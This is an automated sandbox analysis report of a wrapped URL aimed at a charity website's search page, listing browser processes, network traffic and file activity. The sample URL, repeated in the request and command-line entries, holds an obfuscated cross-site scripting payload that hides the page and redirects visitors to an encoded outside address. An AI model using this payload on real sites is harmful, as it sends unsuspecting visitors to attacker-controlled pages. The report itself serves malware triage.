Play interactive tourEdit tour

Windows Analysis Report
https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart

Overview

General Information

Sample URL:	https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*
Analysis ID:	1300682
Infos:

Detection

Score:	20
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Very long command line found

Stores files to the Windows start menu directory

Classification

×

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Compliance

Creates a directory in C:\Program Files

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3584_1402579487			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\LICENSE.txt			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\Filtering Rules			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\manifest.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\_metadata\			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\_metadata\verified_contents.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\manifest.fingerprint			Jump to behavior

Creates license or readme file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\LICENSE.txt

Jump to behavior

Networking

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: accounts.google.com

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=115.0.5790.171&lang=en-GB&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-115.0.5790.171Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart_*20attitudelocal_marine**B20menu.get=*60mime*60*20library.start(*60await*60)*20lib**B20process**A(*60start*60).load*20arch.hand()*20folder.setElementByCode(*60socar*60)**B20contact(*60r*60,*605*60)*20**Aconnect=*60hola*60.fix()*22*3E*3Ciframe*20src=javascript*3A*2F*2Afd7**Aljj*5Bljj.attol1*5Dkhalfyacoleur**Ablanch*2A*2FcodeString=*60win*60*2B*60dow.par*60*2B*60ent.docu*60*2B*60ment.docu*60*2B*60mentEle*60*2B*60ment.st*60*2B*60yle.opa*60*2B*60city=0;url=*5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,91,93,77,80,64,90,121,71*5D;*2F*2Athat*5B*7el**A5D(setInterval,*_hara*)laard**A3000zblaalo**A3000zb*2A*2Fwin*60*2B*60dow.par*60*2B*60ent.loca*60*2B*60tion.hr*60*2B*60ef=url.map(value=*60*2BString.fromCharCode(62)*2B*60String.fromCharCode(value*5E42)).jo*60*2B*60in(%27%27);*2F*2Achw**Echw.toUpUpDown()*2A*2F*60;codeString=codeString.replaceAll(*60salooa*60,*60azefcr*60);executeCode=Function(codeString);*2F*2Athat*5B*ovrir**A5D(sessionStorage,*_selve*)sleep.over**B2A*2FexecuteCode();*2F*2A**Amax.do()*2A*2F*3E*3C*2Fiframe*3E*3Cspan*20style=*60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;**A3E*3C*2Fspan*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20arch.learning()onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart_*20attitudelocal_marine**B20folder.setElementByCode(*socar*ar*)__;JSUlJX5-JcKnfn4lJcKnfn4lwqclJcKnJX4lwqclJSUlJSUlwqclJcKnJSUlJSUlJcKnJcKnJSUlJSUlwqclJSUlJSXCpyUlJSUlJSUlJcKnJSXCpyUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlfn4lfn7Cp8KnJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlwqfCp8KnJSUlJSUlJS HTTP/1.1Host: urldefense.comConnection: keep-alivesec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jerror HTTP/1.1Host: urldefense.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/stylesheets/common.css HTTP/1.1Host: urldefense.comConnection: keep-alivesec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://urldefense.com/jerrorAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/images/proofpoint_logo.jpeg HTTP/1.1Host: urldefense.comConnection: keep-alivesec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://urldefense.com/jerrorAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/images/warning.png HTTP/1.1Host: urldefense.comConnection: keep-alivesec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://urldefense.com/jerrorAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/images/proofpoint_logo.jpeg HTTP/1.1Host: urldefense.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/images/favicon.ico HTTP/1.1Host: urldefense.comConnection: keep-alivesec-ch-ua: "Not/A)Brand";v="99", "Google Chrome";v="115", "Chromium";v="115"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://urldefense.com/jerrorAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/images/warning.png HTTP/1.1Host: urldefense.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic	HTTP traffic detected: GET /jasset/images/favicon.ico HTTP/1.1Host: urldefense.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

URLs found in memory or binary data

Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: LICENSE.txt.0.dr	String found in binary or memory: https://easylist.to/)
Source: LICENSE.txt.0.dr	String found in binary or memory: https://github.com/easylist)

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: AEC=Ad49MVEVy5CxtQLtYrblzXz4DifLm5q80KxkAsZM0tGClBBQswyzDRIjhA; CONSENT=PENDING+494; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDMtMF9SQzIaAmVuIAEaBgiA0dCmBg; __Secure-ENID=14.SE=FEqwE5eimu_CzO8QanixDxMiVRDl1S74wJwxQG4kibYxHFlarNLstM6_FtN3tkTBDN7NI-PM3BH3uafw_juj7Kua5Sxw58UIqMyDvhq3JStE-0GsITWS9X0QrbjvmkA5MVBf-Eb4RLTTefnPk1F_g7MJo2hXw4TzaSRHE_HtskdpjjbT9g

System Summary

Very long command line found

Source: unknown	Process created: Commandline size = 2056
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: Commandline size = 2056			Jump to behavior

Classification label

Source: classification engine

Classification label: sus20.win@24/19@10/6

Spawns processes

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1904,i,17923994011528251687,16385674197559425978,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart_*20attitudelocal_marine**B20menu.get=*60mime*60*20library.start(*60await*60)*20lib**B20process**A(*60start*60).load*20arch.hand()*20folder.setElementByCode(*60socar*60)**B20contact(*60r*60,*605*60)*20**Aconnect=*60hola*60.fix()*22*3E*3Ciframe*20src=javascript*3A*2F*2Afd7**Aljj*5Bljj.attol1*5Dkhalfyacoleur**Ablanch*2A*2FcodeString=*60win*60*2B*60dow.par*60*2B*60ent.docu*60*2B*60ment.docu*60*2B*60mentEle*60*2B*60ment.st*60*2B*60yle.opa*60*2B*60city=0;url=*5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,91,93,77,80,64,90,121,71*5D;*2F*2Athat*5B*7el**A5D(setInterval,*_hara*)laard**A3000zblaalo**A3000zb*2A*2Fwin*60*2B*60dow.par*60*2B*60ent.loca*60*2B*60tion.hr*60*2B*60ef=url.map(value=*60*2BString.fromCharCode(62)*2B*60String.fromCharCode(value*5E42)).jo*60*2B*60in('');*2F*2Achw**Echw.toUpUpDown()*2A*2F*60;codeString=codeString.replaceAll(*60salooa*60,*60azefcr*60);executeCode=Function(codeString);*2F*2Athat*5B*ovrir**A5D(sessionStorage,*_selve*)sleep.over**B2A*2FexecuteCode();*2F*2A**Amax.do()*2A*2F*3E*3C*2Fiframe*3E*3Cspan*20style=*60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;**A3E*3C*2Fspan*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20arch.learning()onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart_*20attitudelocal_marine**B20folder.setElementByCode(*socar*ar*)__;JSUlJX5-JcKnfn4lJcKnfn4lwqclJcKnJX4lwqclJSUlJSUlwqclJcKnJSUlJSUlJcKnJcKnJSUlJSUlwqclJSUlJSXCpyUlJSUlJSUlJcKnJSXCpyUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlfn4lfn7Cp8KnJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlwqfCp8KnJSUlJSUlJS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1904,i,17923994011528251687,16385674197559425978,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart_*20attitudelocal_marine**B20menu.get=*60mime*60*20library.start(*60await*60)*20lib**B20process**A(*60start*60).load*20arch.hand()*20folder.setElementByCode(*60socar*60)**B20contact(*60r*60,*605*60)*20**Aconnect=*60hola*60.fix()*22*3E*3Ciframe*20src=javascript*3A*2F*2Afd7**Aljj*5Bljj.attol1*5Dkhalfyacoleur**Ablanch*2A*2FcodeString=*60win*60*2B*60dow.par*60*2B*60ent.docu*60*2B*60ment.docu*60*2B*60mentEle*60*2B*60ment.st*60*2B*60yle.opa*60*2B*60city=0;url=*5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,91,93,77,80,64,90,121,71*5D;*2F*2Athat*5B*7el**A5D(setInterval,*_hara*)laard**A3000zblaalo**A3000zb*2A*2Fwin*60*2B*60dow.par*60*2B*60ent.loca*60*2B*60tion.hr*60*2B*60ef=url.map(value=*60*2BString.fromCharCode(62)*2B*60String.fromCharCode(value*5E42)).jo*60*2B*60in('');*2F*2Achw**Echw.toUpUpDown()*2A*2F*60;codeString=codeString.replaceAll(*60salooa*60,*60azefcr*60);executeCode=Function(codeString);*2F*2Athat*5B*ovrir**A5D(sessionStorage,*_selve*)sleep.over**B2A*2FexecuteCode();*2F*2A**Amax.do()*2A*2F*3E*3C*2Fiframe*3E*3Cspan*20style=*60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;**A3E*3C*2Fspan*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20arch.learning()onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart_*20attitudelocal_marine**B20folder.setElementByCode(*socar*ar*)__;JSUlJX5-JcKnfn4lJcKnfn4lwqclJcKnJX4lwqclJSUlJSUlwqclJcKnJSUlJSUlJcKnJcKnJSUlJSUlwqclJSUlJSXCpyUlJSUlJSUlJcKnJSXCpyUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlfn4lfn7Cp8KnJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlwqfCp8KnJSUlJSUlJS			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Windows shortcut file (LNK) contains relative path

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Creates files inside the program directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\chrome_BITS_3584_1402579487

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Creates a directory in C:\Program Files

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3584_1402579487			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\LICENSE.txt			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\Filtering Rules			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\manifest.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\_metadata\			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\_metadata\verified_contents.json			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\manifest.fingerprint			Jump to behavior

Persistence and Installation Behavior

Creates license or readme file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\chrome_PuffinComponentUnpacker_BeginUnzipping3584_1556473213\LICENSE.txt

Jump to behavior

Boot Survival

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk			Jump to behavior

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.